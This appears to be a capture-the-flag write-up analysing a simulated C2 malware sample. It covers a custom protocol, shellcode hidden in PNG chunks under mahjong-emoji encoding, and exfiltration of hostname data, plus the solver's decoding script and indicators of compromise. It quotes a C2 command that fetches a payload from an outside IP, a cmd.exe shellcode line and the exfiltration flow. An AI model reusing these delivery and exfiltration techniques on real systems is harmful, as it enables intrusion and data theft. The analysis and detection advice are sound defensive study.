Content is user-generated and unverified.

C2 Malware Architecture & Script Explanation

🔴 How the Malware C2 Works

Architecture Overview

┌─────────────────┐         ┌──────────────────┐
│   C2 Server     │◄───────►│  Infected Client │
│ 34.124.239.18   │         │   (Victim PC)    │
│   Port 9000     │         │                  │
└─────────────────┘         └──────────────────┘
        │                            │
        │  HTTP (Port 80)            │
        ▼                            ▼
┌─────────────────┐         ┌──────────────────┐
│  Web Server     │         │  Downloads PNGs  │
│  /images/*.png  │◄────────│  Executes Code   │
│  /api/update.php│◄────────│  Uploads Results │
└─────────────────┘         └──────────────────┘

🔄 Complete Attack Flow

Phase 1: Initial Connection

Malware connects to C2 on port 9000
Sends beacon: "agent online"
Establishes TCP session with custom protocol

Phase 2: Command & Control (Port 9000)

The C2 uses a custom binary protocol:

Message Types:
┌──────────────┬───────┬────────────────────────────┐
│ Message Type │ Value │ Description                │
├──────────────┼───────┼────────────────────────────┤
│ MSG_TEXT     │   1   │ Text messages              │
│ MSG_COMMAND  │  32   │ Commands from C2           │
│ MSG_PING     │ 254   │ Keepalive ping             │
│ MSG_PONG     │ 255   │ Keepalive pong + flag      │
└──────────────┴───────┴────────────────────────────┘

Packet Structure:

MSG_COMMAND:
┌─────────┬─────────────┬─────────────┐
│ Type(1) │ Length(2)   │ Command     │
│  0x20   │ uint16_t    │ UTF-8 text  │
└─────────┴─────────────┴─────────────┘

MSG_TEXT:
┌─────────┬─────────────┬─────────────┐
│ Type(1) │ Length(4)   │ Text        │
│  0x01   │ uint32_t    │ UTF-8 text  │
└─────────┴─────────────┴─────────────┘

Phase 3: Malicious Payload Delivery

C2 sends command: getrunurl http://34.124.239.18/images/niarRF.png

What happens:

Malware downloads PNG file via HTTP
PNG appears normal but contains hidden shellcode
Shellcode is hidden in a custom stEg PNG chunk

Steganography Structure:

PNG File:
├── PNG Header (89 50 4E 47...)
├── IHDR chunk (image metadata)
├── IDAT chunks (actual image data)
├── stEg chunk ← HIDDEN SHELLCODE HERE!
│   ├── Mahjong-encoded payload
│   ├── Compressed with zlib (prefix: 'Z')
│   └── Contains: x86-64 shellcode
└── IEND chunk (end marker)

Phase 4: Shellcode Execution

The shellcode does:

batch

cmd.exe /c echo key: niarRF > C:\Users\Public\rest.txt

This writes a decryption key to a file that the malware reads.

Key Format:

Ends with RF = "Real Flag" → uses hostname + Windows version
Ends with FF = "Fake Flag" → uses random string

Phase 5: Data Exfiltration

Malware reads the key and generates encrypted payload:

Flow:
hostname = "DESKTOP-P477C8C"
windows_ver = "10.0.19045"
plaintext = "flag{DESKTOP-P477C8C_10.0.19045}"
                    ↓
        XOR encrypt with key "niarRF"
                    ↓
            Base64 encode
                    ↓
        Mahjong tile encode 🀇🀈🀉...
                    ↓
        Embed in PNG stEg chunk
                    ↓
    POST to http://34.124.239.18/api/update.php

Mahjong Encoding: Each byte becomes 2 mahjong tile emojis (16 tiles = 0-F in hex):

Example: Byte 0x4A → 🀋🀑 (tile[4] + tile[10])

🔍 What Our Script Does

Phase 1: Protocol Parsing

python

parse_message(data)

Decodes custom binary protocol (MSG_TEXT, MSG_COMMAND, etc.)
Extracts all C2 commands like getrunurl ...
Extracts all responses like "Upload 200", "Downloaded"

Phase 2: TCP Stream Reassembly

python

reassemble_tcp_streams(packets)

Reconstructs fragmented packets into complete TCP streams
Handles HTTP traffic split across multiple packets
Groups bidirectional communication by connection

Phase 3: PNG Extraction

python

extract_pngs_from_stream(stream_data)

Finds all PNG signatures (89 50 4E 47) in HTTP traffic
Extracts complete PNG files (from header to IEND chunk)
Separates downloads vs uploads:
- GET requests → Downloaded PNGs (contain shellcode)
- POST requests → Uploaded PNGs (contain encrypted data)

Phase 4: Shellcode Analysis

python

extract_steg_chunk(png_data)
mahjong_decode(mahjong_str)

Extracts stEg chunks from downloaded PNGs
Decodes mahjong tiles back to binary shellcode
Decompresses zlib (if starts with 'Z')
Extracts printable strings from shellcode
Finds encryption keys (pattern: xxxRF or xxxFF)

Example extraction:

Shellcode string: "niarRF> PH"
                       ↓
                  Key: niarRF

Phase 5: Decryption

python

decrypt_exfiltrated_data(mahjong_payload, key)

Full decryption chain:

Uploaded PNG stEg chunk
       ↓
🀇🀈🀉🀊... (mahjong tiles)
       ↓ mahjong_decode()
Raw bytes
       ↓ base64.b64decode()
Encrypted bytes
       ↓ xor_decrypt(key)
flag{DESKTOP-P477C8C_10.0.19045}

🎯 Key Techniques Used by Malware

1. Steganography

Hides shellcode inside legitimate-looking PNG files
Uses custom stEg chunk type (not standard PNG)
Image displays normally in viewers

2. Multi-Layer Encoding

Mahjong encoding: Obfuscates payload as Unicode emojis
Base64 encoding: Standard encoding layer
XOR encryption: Simple but effective with custom key
Zlib compression: Reduces payload size

3. Living off the Land

Uses cmd.exe to execute commands
Writes to C:\Users\Public\ (no admin needed)
Uses system shellcode runner (shellcode_runner.exe)

4. Anti-Analysis

Custom binary protocol (not HTTP for C2)
Obfuscated payloads
Time-based execution (waits for shellcode output)
Cleans up artifacts (rest.txt is deleted)

5. Covert Exfiltration

Data hidden in PNG uploads (looks like image uploads)
Posts to /api/update.php (looks like software update)
Uses realistic filenames: IMG_shot_12345.png

📊 Script Output Breakdown

[PHASE 1] C2 Commands & Responses
├─ Shows: All commands from C2
├─ Shows: All responses from malware
└─ Purpose: Understand command flow

[PHASE 2] PNG Extraction
├─ Downloaded PNGs: Contain shellcode + keys
├─ Uploaded PNGs: Contain encrypted flags
└─ Purpose: Get raw payload files

[PHASE 3] Key Extraction
├─ Decodes shellcode from downloaded PNGs
├─ Extracts keys (niarRF, deenFF, etc.)
└─ Purpose: Get decryption keys

[PHASE 4] Decryption
├─ Tries all keys on all uploads
├─ Decrypts successful matches
└─ Purpose: Reveal exfiltrated data

🔐 Encryption Details

XOR Encryption

python

def xor_encrypt(plaintext, key):
    for i in range(len(plaintext)):
        encrypted[i] = plaintext[i] XOR key[i % len(key)]

Why XOR?

Fast and simple
Symmetric (same function for encrypt/decrypt)
Key repeats cyclically
Easily reversible if key is known

Mahjong Tile Encoding

python

# 16 tiles represent hex digits 0-F
🀇=0, 🀈=1, 🀉=2, ... 🀖=15

Byte 0x3A (58 decimal) = 0011 1010 binary
                         ↓     ↓
                         3  +  A
                         ↓     ↓
                        🀊  + 🀑

Why Mahjong?

Looks innocuous (just emojis)
Harder to detect with regex
Not flagged by basic AV/EDR
Compact representation

🛡️ Detection & Defense

IOCs (Indicators of Compromise)

Network:
- C2: 34.124.239.18:9000
- HTTP: 34.124.239.18:80
- Custom binary protocol on port 9000
- PNG files with 'stEg' chunks

File System:
- C:\Users\Public\rest.txt (temporary)
- shellcode_runner.exe
- PNG files in temp directory

Behavior:
- Outbound connection to port 9000
- HTTP requests to /images/*.png
- HTTP POST to /api/update.php
- cmd.exe spawned by suspicious process

How to Detect This

Monitor unusual ports (9000 is non-standard)
Inspect PNG uploads for custom chunks
Check for Unicode emoji in network traffic
Monitor C:\Users\Public\ file creation
Alert on shellcode execution patterns

💡 Summary

What the malware does:

Connects to C2, receives commands
Downloads PNG files containing hidden shellcode
Executes shellcode to get encryption key
Encrypts system info (hostname, Windows version)
Hides encrypted data in PNG, uploads to C2

What our script does:

Parses custom C2 protocol from PCAP
Reassembles HTTP streams
Extracts all PNG files (downloads & uploads)
Decodes shellcode to find keys
Decrypts all uploaded payloads
Shows complete attack timeline & data

The Result: Complete visibility into the entire attack chain, from initial connection to final data exfiltration! 🎯

Content is user-generated and unverified.